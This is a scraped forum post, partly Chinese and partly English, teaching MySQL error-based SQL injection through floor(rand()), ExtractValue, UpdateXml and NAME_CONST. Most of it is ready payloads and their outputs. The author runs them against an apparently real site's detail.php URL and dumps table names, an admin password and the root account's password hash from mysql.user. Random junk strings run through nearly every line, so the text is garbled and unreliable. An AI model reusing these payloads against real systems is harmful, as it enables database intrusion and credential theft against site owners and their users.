|
1、通过floor报错 可以通过如下一些利用代码 and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a); and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2))); 举例如下:
; ]6 E* |/ b/ q( J: N首先进行正常查询: mysql> select * from article where id = 1;
# H+ p2 z$ k% A( {5 j+—-+——-+———+% y5 x" d4 o8 C# `
| id | title | content |
4 X0 G7 z1 V- g: O, H+ M+—-+——-+———+
3 n5 `6 F1 A& g: f, R! p% P| 1 | test | do it |$ ]( o7 V. V- V. K# Q; ]( }0 V
+—-+——-+———+ 假如id输入存在注入的话,可以通过如下语句进行报错。 mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
% ^* m/ e; R- N! t8 MERROR 1062 (23000): Duplicate entry ’5.1.33-community-log1′ for key ’group_key’ 可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。* `$ V% p$ R8 s( t3 ]5 i
例如我们需要查询管理员用户名和密码: Method1: mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
( e H0 j4 A8 b3 s& ]7 eERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ Method2: mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));" [) k3 q0 J( g" Q0 P; a- G5 K0 M
ERROR 1062 (23000): Duplicate entry ’admin8881′ for key ’group_key’ 2、ExtractValue8 r% m6 A5 _9 S; V0 p9 l9 P$ Y6 z" B Y, B
测试语句如下 and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); 实际测试过程 mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));–
) P/ n5 z% n. X& ^ERROR 1105 (HY000): XPATH syntax error: ’\admin888′ 3、UpdateXml 测试语句 and 1=(updatexml(1,concat(0x3a,(select user())),1)) 实际测试过程 mysql> select * from article where id = 1 and 1=(updatexml(0x3a,concat(1,(select user())),1))ERROR 1105 (HY000): XPATH syntax error: ’:root@localhost’ + O+ a9 X; z, H9 e' i
5 B9 P. y# a. m再收集: - a" |/ P- I7 u7 D0 o$ z
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
; ^/ ]0 E0 _; c: g! @( s8 L/ d& M3 e+ ]' T: v; d
Error uplicate column name ‘5.0.27-community-nt’Error uplicate column name ‘5.0.27-community-nt’/ s+ V& }/ S. [1 N% S. H& ~/ Q3 C
! d h4 E+ ~ Q' a$ nhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
$ E$ Y6 ~! K+ a2 O! s
$ I- T h9 A" uError uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′Error uplicate column name ‘root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82′ 5 n T/ c- r$ z b# q8 l# p
! {3 M: V9 r( L/ C9 ^
MYSQL高版本报错注入技巧-利用NAME_CONST注入
* z1 g. `% q/ LIt's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
) ?! `; B. c! x6 ~6 g( Q' y X: ~; d$ Z; a8 K7 T
( F2 B4 E" u( \3 T6 K1 ^. _
相关信息+ @* P- q* N8 h8 ~: x
% p% f7 p8 ~3 @# D/ Q* v% k2 |
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
% o& A- N3 `0 F$ ~, l, v& V3 t, [: D1 _5 P% L& ]
Code:
- `/ i. j0 J3 `NAME_CONST(DATA, VALUE)
9 i. M( l# g! r n
# @/ c! W0 l% K; C0 g- Q3 gReturns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
/ D8 [& [4 h8 _- R
& B. ~1 v$ H- a2 USELECT NAME_CONST('TEST', 1)9 u9 H: s: b5 i0 g; h4 `
, p9 ~5 i/ M0 b; d4 T$ E
( g+ j; S6 n) v3 Y' G) O: G
, H2 L. y1 L% N( w|---------------|3 A9 t( s) G5 U9 e6 ]3 K
| TEST |2 ~, W8 k* f% P3 g2 E6 k3 t
| |7 F! K5 B. c y9 r
|---------------|
9 U" t" A3 z0 t| 1 |5 z8 ~/ W) c/ Y
| |, w( c/ Z- T+ k# I% E9 @
|---------------|% d( r6 N7 F6 P. p% P8 y( g
3 e( C! h3 V3 x" Q9 c$ j% F5 X' C. N5 R
4 u/ w7 h% ?6 L
; i1 ^4 i, M8 z+ X2 [http://dev.mysql.com/doc/refman/5.0/en/m...name-const/ D' ?! i) M( Q7 X/ G4 w
Intro to MySQL Variables
1 W6 _6 p7 C& G0 E) V$ U( _3 |
, C+ _5 R8 D2 ]+ N- H6 s" L' BOnce you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST.# W6 }7 `' H7 d% b% |
. R. l% \# x4 U% Z4 `* d% eCode:
1 B6 c) l! E' ]8 T8 yhttp://www.baido.hk/qcwh/content ... ;sid=19&cid=261' O+ X; W- _$ L& [2 V
5 O% S; o c1 ]/ m) t1 A: f9 s, R# D7 t
3 F* z- k( E( U
- S! k9 x% c9 i9 K1 Q1 k x
! |5 y) Z/ S: S- V* x" tCode:
& g$ k5 @4 b A1 O/ ~- wand+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
& s7 C* L( h; F5 Z* u6 M3 }: ]. \
7 H% ]$ c5 A' ?7 T& k
6 X4 d! _. T- y* _8 YVAR = Your MySQL variable.' w7 z+ c |( B6 }# D" B9 ^2 H. v, c
& y( X3 }* N6 C: |3 pMySQL 5.1.3 Server System Variables
; O; H0 E3 \1 K7 b4 s9 `& R" @, Z
Let's try it out on my site..
& |+ \4 e0 t8 |- C& U+ V3 S" K' N' \; n4 n( ~( r
Code:
$ G1 Q; q% S: }& c8 Q9 n7 n4 xhttp://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
1 }/ ]+ v& a- u( f
0 f3 z* K# U( l. Z- v& ]% K gError uplicate column name '5.0.27-community-nt'; I' r6 }( ]( S/ k9 O
3 v& a4 u6 t$ P! Y5 {9 T
; {" Z! D+ s' v6 T7 z& H2 I& X3 g O
/ K8 E& O5 _* N) z7 T& k. M! L* s1 z( u. t/ s3 a- R; t
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again...9 t) M, s+ } T( ], N/ U; l
( Z7 g6 w, h O# D
Data Extraction
7 Q5 _* ~- b8 e7 z4 n/ B, ~
6 ~! G) ]( a* c- B" H2 r5 d6 @Code:/ C+ x' e. T2 d7 V
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
* R% P: P7 ~8 v4 Y# w: T0 w9 k5 ?5 `7 e1 z% \ s
/ X& r3 N- c. g' U: Y& {/ fWe should get a duplicate column 1 error..." K! S+ P. l/ Y2 o! @/ `
5 {- r) L$ u O8 s1 n" ?) R R
Code:
- T3 s1 \8 }8 C4 C b5 d/ j4 shttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--% g! g! n2 k* i$ v: |9 I
& v6 {& n5 g/ N4 B) ?5 }8 Z
Error uplicate column name '1
* c {+ o+ w, \: o
4 w0 K' `2 _/ @9 t4 I, u
0 k5 J6 c; \% V5 i: O% p4 W3 G9 m; E5 _1 t# i
0 r/ u5 C" c7 X% P; ^
) c) {8 c/ V( E8 r/ i4 |: \! A1 g$ B* a- O J. P6 a
Now let's get the tables out this bitch..- D5 K3 a# R: R# _
8 e5 T0 {$ t* G' e* ~7 ECode:
]: N& f) }2 s+ k3 |2 z: c, m9 @+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
3 f& D" _; _+ B! c! r" t$ m
j) u1 W, }$ L# f/ E
. S( U: V$ _& _! K) C: ZLet's see if it works here, if it does, we can go on and finish the job.6 G' m \0 e, ]' Z' i, e
0 @$ q- @$ X' U' x8 Q2 ~# P+ N% \
Code:
8 P6 o9 l/ s. t0 F% g/ hhttp://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
8 A4 c) ?: o% j7 o3 `" Z1 n( b5 }1 f; }
; M/ [" m+ F# q5 V h% Y. HError uplicate column name 'com_admanage1 p% p- ~+ y: I
4 z7 y! q, G. N7 N" d0 L% g; P. f8 F8 F7 Q: ?" z
/ c! N; f# a; V+ Z1 y
9 h, Y) m8 r" V/ |, D# @/ o8 o6 B: n7 p: A# l
6 ~; a) k& m6 C5 Q$ _Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
3 l. H( ^& \( U0 i) O. Z/ Z8 m2 ]& r, H; j
Let's get the columns out of the user table..
1 F1 F% z! P" E" x* G, |, h7 P) D2 Y; q- X; h0 ~2 y6 }
Code:" D& B Z0 G) f, a$ v2 a
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--, g ^6 |& J) e
6 P& R+ q* V! ?* Y. A
+ f& `% F! }6 u) ~ o+ NSo mine looks like this, and I get the duplicate column name 'Host'.
( T6 `( [% L0 b9 Y, S& Z1 a2 E1 k' C, n: W2 P6 T3 k
Code:/ j9 d; ^. j( d0 M. K& e
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
% V# w. ^) t; w2 B3 }2 c
) j2 k; {9 v* H& oError uplicate column name 'Host') |* u7 h0 T& q! X
. b2 C+ U& f; k% ~% _; ?2 h P: P0 O& v2 J7 p
% P. J1 g2 v7 {* y7 v
: D- {4 N) D+ k; g
' e3 P8 h1 C/ q- a# A3 V `* g2 I" [
Woot, time to finish this bitch off.$ S* U" T! Z! \/ A; y% x# ^
% X! r$ G9 _) @1 I
Code: C+ y1 x; ]# I( d/ @( V/ m. ~
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
) p$ y8 L- _/ {/ b4 K, U# ^. M- V/ |" M7 |4 x) y2 B4 r/ E
t: ]$ z( ]; a/ P: z1 j2 \3 Y% M( y
So mine looks like this...$ y- X P4 u0 [# l2 y
# ~* e. O- k4 M5 O' @
Code:
* V Q. A- v0 n1 lhttp://www.baido.hk /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--4 [' C8 i- K& E ? x" {" G3 p
7 n9 H4 |6 @* o1 H; V7 _
Error uplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'% V! m3 f/ }, P
, m# B* Q7 j, z- E/ T: w) s. D- a7 [4 p: u6 e _% y' m
6 L v% e9 x2 V4 A2 y! C
v t7 D( I8 w8 R& v& p# w
1 d* F* S/ N' ^2 L% t' `6 d8 ]5 E+ s5 f( c" f8 {4 C. \
And there we have it, thanks for reading.: X* w7 D2 H% u
; q9 \$ q/ f. H. k! z" p2 {# M |